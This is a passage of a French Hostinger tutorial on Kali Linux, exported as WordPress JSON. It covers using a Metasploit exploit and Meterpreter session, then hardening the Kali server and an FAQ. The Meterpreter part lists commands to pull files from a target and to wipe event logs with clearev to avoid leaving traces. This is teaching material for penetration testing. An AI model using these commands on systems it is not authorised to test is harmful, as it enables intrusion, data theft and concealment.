0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Faites attention aux champs obligatoires dont les valeurs sont vides, ce qui indique que vous devez les d&eacute;finir manuellement. Dans notre cas, nous devons d&eacute;finir l&rsquo;IP cible et le mot de passe :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">set RHOSTS [ip_cible]\n\nset PASSWORD [mot-de-passe-cible]<\/pre><p><strong>Interagir avec la cible<\/strong><\/p><p>Une fois que tout est configur&eacute;, ex&eacute;cutez l&rsquo;exploit :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">run<\/pre><p>Cette commande ouvre une session Meterpreter, qui offre un contr&ocirc;le puissant sur le syst&egrave;me cible. Pour comprendre l&rsquo;environnement dans lequel vous travaillez, commencez par ces commandes :<\/p><ul class=\"wp-block-list\">\n<li>V&eacute;rifier les informations sur le syst&egrave;me :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sysinfo<\/pre><ul class=\"wp-block-list\">\n<li>V&eacute;rifier l&rsquo;utilisateur actuel :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getuid<\/pre><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474ddc371\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"318\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-meterpreter-sysinfo.png\/public\" alt=\"Les r&eacute;sultats des commandes sysinfo et getuid dans Meterpreter \" class=\"wp-image-38088\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-meterpreter-sysinfo.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-meterpreter-sysinfo.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-meterpreter-sysinfo.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/terminal-meterpreter-sysinfo.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Comme pour la navigation sur votre serveur, Meterpreter fournit des commandes pour interagir avec le syst&egrave;me de fichiers de la cible :<\/p><ul class=\"wp-block-list\">\n<li>Lister les fichiers du r&eacute;pertoire actuel :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ls<\/pre><ul class=\"wp-block-list\">\n<li>Changer de r&eacute;pertoire :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/chemin\/vers\/r&eacute;pertoire<\/pre><ul class=\"wp-block-list\">\n<li>T&eacute;l&eacute;charger un fichier de la cible vers votre syst&egrave;me local :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">download \/chemin\/vers\/fichier\/cible<\/pre><ul class=\"wp-block-list\">\n<li>T&eacute;l&eacute;verser un fichier vers le syst&egrave;me cible, tel qu&rsquo;un script ou un utilitaire :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">upload \/chemin\/vers\/fichier\/local<\/pre><p>Vous pouvez &eacute;galement obtenir des d&eacute;tails sur les connexions et les interfaces r&eacute;seau de la cible :<\/p><ul class=\"wp-block-list\">\n<li>Afficher les interfaces r&eacute;seau :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ifconfig<\/pre><ul class=\"wp-block-list\">\n<li>V&eacute;rifier les connexions r&eacute;seau actives :<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">netstat<\/pre><div class=\"wp-block-image\">\n<figure data-wp-context='{\"imageId\":\"6a00474ddcab9\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-full wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"577\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-meterpreter-ifconfig-netstat.png\/public\" alt=\"Les r&eacute;sultats des commandes ifconfig et netstat dans Meterpreter\" class=\"wp-image-38089\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-meterpreter-ifconfig-netstat.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-meterpreter-ifconfig-netstat.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-meterpreter-ifconfig-netstat.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2025\/02\/output-meterpreter-ifconfig-netstat.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Agrandir\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>Lorsque vous avez termin&eacute;, n&rsquo;oubliez pas de nettoyer pour &eacute;viter de laisser des traces :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">clearev<\/pre><p>Ensuite, quittez la session Meterpreter en cliquant sur :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">exit<\/pre><h2 class=\"wp-block-heading\" id=\"h-securiser-kali-linux\">S&eacute;curiser Kali Linux<\/h2><p>L&rsquo;utilisation de Kali Linux pour des t&acirc;ches de s&eacute;curit&eacute; signifie que vous devez donner la priorit&eacute; &agrave; la s&eacute;curisation de votre propre syst&egrave;me, car un syst&egrave;me compromis pourrait exposer des donn&eacute;es sensibles, perturber votre travail ou m&ecirc;me &ecirc;tre utilis&eacute; pour lancer des attaques contre d&rsquo;autres personnes.<\/p><p>Kali Linux suit les meilleures pratiques de <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/securite-vps\">s&eacute;curit&eacute; des VPS Linux<\/a>, telles que :<\/p><p><strong>Mise &agrave; jour r&eacute;guli&egrave;re<\/strong><\/p><p>La <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/mettre-a-jour-kali-linux\">mise &agrave; jour de Kali Linux<\/a> est l&rsquo;un des moyens les plus efficaces de le s&eacute;curiser :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update &amp;&amp; sudo apt -y upgrade<\/pre><p>Cela permet de s&rsquo;assurer que vous disposez des derniers correctifs de s&eacute;curit&eacute; pour Kali Linux et tous les outils install&eacute;s.<\/p><p><strong>D&eacute;sactiver la connexion root<\/strong><\/p><p>Se connecter en tant que root via SSH est risqu&eacute;. Cr&eacute;ez plut&ocirc;t un utilisateur distinct disposant des privil&egrave;ges sudo :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo adduser &lt;nouvel_utilisateur&gt;\n\nsudo usermod -aG sudo &lt;nouvel_utilisateur&gt;<\/pre><p>Modifiez ensuite le fichier de configuration SSH :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo nano \/etc\/ssh\/sshd_config<\/pre><p>Recherchez la ligne <strong>PermitRootLogin <\/strong>et d&eacute;finissez-la sur <strong>no <\/strong>pour d&eacute;sactiver l&rsquo;acc&egrave;s direct &agrave; la racine via SSH. Enregistrez le fichier, puis red&eacute;marrez le service SSH :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart ssh<\/pre><p><strong>Utiliser un pare-feu<\/strong><\/p><p>Un pare-feu limite l&rsquo;acc&egrave;s &agrave; votre VPS et bloque le trafic ind&eacute;sirable. Comme d&rsquo;autres distributions, Kali Linux prend en charge le <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/comment-configurer-pare-feu-ufw\">pare-feu non compliqu&eacute; (UFW)<\/a> qui est simple &agrave; configurer.<\/p><p>Installer et activer l&rsquo;UFW :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install ufw\n\nsudo ufw enable<\/pre><p>N&rsquo;autorisez que les services essentiels, tels que SSH, sur votre port personnalis&eacute; :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw allow 2222\/tcp<\/pre><p>Vous pouvez ajuster les r&egrave;gles en fonction des autres services que vous pr&eacute;voyez d&rsquo;ex&eacute;cuter. Une fois cela fait, v&eacute;rifiez l&rsquo;&eacute;tat du pare-feu :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw status<\/pre><p><strong>Installer Fail2Ban<\/strong><\/p><p>Fail2Ban surveille les journaux et bloque automatiquement les adresses IP ayant une activit&eacute; suspecte, comme des tentatives de connexion &eacute;chou&eacute;es &agrave; plusieurs reprises. Installez-le avec :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install fail2ban<\/pre><p>Fail2Ban est configur&eacute; par d&eacute;faut pour prot&eacute;ger SSH, mais vous pouvez ajuster ses param&egrave;tres dans <strong>\/etc\/fail2ban\/jail.conf <\/strong>pour surveiller d&rsquo;autres services. Red&eacute;marrez Fail2Ban apr&egrave;s avoir effectu&eacute; les modifications :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart fail2ban<\/pre><p><strong>Limiter les autorisations sudo<\/strong><\/p><p>Pour tous les utilisateurs suppl&eacute;mentaires que vous ajoutez, limitez leurs privil&egrave;ges sudo aux seules commandes n&eacute;cessaires. Utilisez la <a href=\"https:\/\/www.hostinger.com\/fr\/tutoriels\/utiliser-sudo-et-le-fichier-sudoers\">commande visudo<\/a> pour configurer soigneusement les autorisations sudo :<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo visudo<\/pre><p>Cela vous permet de sp&eacute;cifier strictement les commandes que chaque utilisateur peut ex&eacute;cuter avec sudo.<\/p><figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.hostinger.com\/fr\/vps\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"300\" src=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/public\" alt=\"\" class=\"wp-image-41471\" srcset=\"https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=1024,fit=scale-down 1024w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=300,fit=scale-down 300w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=150,fit=scale-down 150w, https:\/\/imagedelivery.net\/LqiWLm-3MGbYHtFuUbcBtA\/wp-content\/uploads\/sites\/46\/2022\/12\/FR-VPS-hosting_in-text-banner-1024x300-1.png\/w=768,fit=scale-down 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2><p>Dans ce tutoriel, nous avons abord&eacute; les principes fondamentaux de l&rsquo;utilisation de Kali Linux &agrave; des fins de s&eacute;curit&eacute;. Nous avons d&eacute;crit comment acc&eacute;der &agrave; votre environnement Kali Linux, ex&eacute;cuter les commandes essentielles, g&eacute;rer les outils sp&eacute;cialis&eacute;s et effectuer des &eacute;valuations &agrave; l&rsquo;aide de Nmap, Hydra et Metasploit.<\/p><p>Nous avons &eacute;galement soulign&eacute; l&rsquo;importance de s&eacute;curiser votre propre syst&egrave;me Kali Linux en effectuant des mises &agrave; jour r&eacute;guli&egrave;res, en d&eacute;sactivant le login root et en configurant des outils tels qu&rsquo;un pare-feu et Fail2Ban.<\/p><p>Kali Linux dispose de centaines d&rsquo;outils pour les tests de p&eacute;n&eacute;tration, l&rsquo;&eacute;valuation des vuln&eacute;rabilit&eacute;s et la d&eacute;couverte de r&eacute;seaux. Continuez &agrave; explorer ses capacit&eacute;s pour approfondir vos comp&eacute;tences en cybers&eacute;curit&eacute;. Si vous avez des questions ou souhaitez partager votre exp&eacute;rience avec Kali Linux, n&rsquo;h&eacute;sitez pas &agrave; utiliser la section de commentaires ci-dessous.<\/p><h2 class=\"wp-block-heading\" id=\"h-tutoriel-kali-linux-faq\">Tutoriel Kali Linux &ndash; FAQ<\/h2><div class=\"schema-faq wp-block-yoast-faq-block\"><div class=\"schema-faq-section\" id=\"faq-question-1738681861536\"><h3 class=\"schema-faq-question\">Comment lancer un scan du r&eacute;seau avec Kali Linux ?<\/h3> <p class=\"schema-faq-answer\">Utilisez Nmap pour effectuer un scan du r&eacute;seau. Ex&eacute;cutez <strong>nmap [ip_cible] <\/strong>pour d&eacute;couvrir les ports ouverts et les services actifs. Pour la d&eacute;tection des services, ex&eacute;cutez <strong>nmap -sV [ip_cible]<\/strong>, qui d&eacute;taille les versions ex&eacute;cut&eacute;es sur les ports ouverts.<\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1738681872065\"><h3 class=\"schema-faq-question\">Puis-je ex&eacute;cuter des applications graphiques sur Kali Linux ?<\/h3> <p class=\"schema-faq-answer\">Oui, vous pouvez ex&eacute;cuter des applications graphiques en installant Kali Linux sur un ordinateur de bureau ou en le configurant comme une machine virtuelle &agrave; l&rsquo;aide de VirtualBox. Si vous installez Kali Linux sur un VPS, activez l&rsquo;acc&egrave;s graphique via la redirection X11 ou configurez un serveur VNC avec un environnement de bureau l&eacute;ger comme <a href=\"https:\/\/www.xfce.org\" target=\"_blank\" rel=\"noopener\">XFCE<\/a>.<\/p> <\/div> <div class=\"schema-faq-section\" id=\"faq-question-1738681881429\"><h3 class=\"schema-faq-question\">Comment automatiser des t&acirc;ches sur Kali Linux ?<\/h3> <p class=\"schema-faq-answer\">Automatisez les t&acirc;ches dans Kali Linux en utilisant de simples <a href=\"https:\/\/blog.hostinger.io\/fr-tutoriels\/script-bash\" target=\"_blank\" rel=\"noopener\">scripts bash<\/a> pour les commandes r&eacute;p&eacute;titives. Planifiez-les avec <a href=\"https:\/\/blog.hostinger.io\/fr-tutoriels\/cron-job\" target=\"_blank\" rel=\"noopener\">cron<\/a> en &eacute;ditant le fichier crontab (<strong>crontab -e<\/strong>) pour d&eacute;finir des temps d&rsquo;ex&eacute;cution afin que vos scripts s&rsquo;ex&eacute;cutent automatiquement &agrave; des intervalles sp&eacute;cifi&eacute;s.<\/p> <\/div> <\/div>\n","protected":false},"excerpt":{"rendered":"<p>En tant que syst&egrave;me d&rsquo;exploitation ax&eacute; sur la s&eacute;curit&eacute;, Kali Linux vous permet d&rsquo;effectuer diverses t&acirc;ches, telles que les tests de p&eacute;n&eacute;tration, la criminalistique num&eacute;rique et l&rsquo;analyse de r&eacute;seau. Avec des centaines d&rsquo;outils de s&eacute;curit&eacute;, Kali Linux est id&eacute;al pour les sp&eacute;cialistes de la cybers&eacute;curit&eacute; et les passionn&eacute;s qui cherchent &agrave; &eacute;largir leurs comp&eacute;tences. Si [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"\/fr\/tutoriels\/tutoriel-kali-linux\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":355,"featured_media":38068,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"rank_math_title":"Tutoriel Kali Linux : Outils et tests de s\u00e9curit\u00e9","rank_math_description":"Apprenez \u00e0 utiliser Kali Linux : acc\u00e8s \u00e0 l\u2019environnement, gestion des outils, tests de s\u00e9curit\u00e9 et protection de votre syst\u00e8me.","rank_math_focus_keyword":"tutoriel kali linux","footnotes":""},"categories":[4760],"tags":[],"class_list":["post-38056","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vps"],"hreflangs":[{"locale":"en-US","link":"https:\/\/www.hostinger.com\/tutorials\/kali-linux-tutorial","default":0},{"locale":"fr-FR","link":"https:\/\/www.hostinger.com\/fr\/tutoriels\/tutoriel-kali-linux","default":0},{"locale":"es-ES","link":"https:\/\/www.hostinger.com\/es\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-UK","link":"https:\/\/www.hostinger.com\/uk\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-MY","link":"https:\/\/www.hostinger.com\/my\/tutorials\/how-to-set-up-shipping-in-woocommerce-14","default":0},{"locale":"en-PH","link":"https:\/\/www.hostinger.com\/ph\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-IN","link":"https:\/\/www.hostinger.com\/in\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-CA","link":"https:\/\/www.hostinger.com\/ca\/tutorials\/kali-linux-tutorial","default":0},{"locale":"es-AR","link":"https:\/\/www.hostinger.com\/ar\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-MX","link":"https:\/\/www.hostinger.com\/mx\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-CO","link":"https:\/\/www.hostinger.com\/co\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-AU","link":"https:\/\/www.hostinger.com\/au\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-NG","link":"https:\/\/www.hostinger.com\/ng\/tutorials\/kali-linux-tutorial","default":0}],"_links":{"self":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/38056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/users\/355"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/comments?post=38056"}],"version-history":[{"count":21,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/38056\/revisions"}],"predecessor-version":[{"id":40007,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/posts\/38056\/revisions\/40007"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/media\/38068"}],"wp:attachment":[{"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/media?parent=38056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/categories?post=38056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hostinger.com\/fr\/tutoriels\/wp-json\/wp\/v2\/tags?post=38056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}